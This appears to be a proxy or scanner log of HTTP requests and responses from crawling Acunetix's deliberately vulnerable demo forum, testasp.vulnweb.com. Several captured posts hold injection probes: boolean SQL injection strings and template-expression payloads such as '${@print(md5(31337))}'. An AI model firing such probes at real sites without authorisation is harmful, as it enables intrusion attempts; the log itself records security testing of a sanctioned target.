Response Body - size: 4,144 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4189 |
Response Body - size: 4,189 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx[[${98991*97996}]]xca </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx[[${98991*97996}]]xca </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx[[${98991*97996}]]xca - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4145 |
Response Body - size: 4,145 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>${@print(md5(31337))}\</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4192 |
Response Body - size: 4,192 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum acx__${98991*97996}__::.x </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/acx__${98991*97996}__::.x </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>acx__${98991*97996}__::.x - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4186 |
Response Body - size: 4,186 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+497-497) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+497-497) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+497-497) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4203 |
Response Body - size: 4,203 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3+627-627-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3+627-627-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3+627-627-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:42 GMT Content-Length: 4144 |
Response Body - size: 4,144 bytes. |
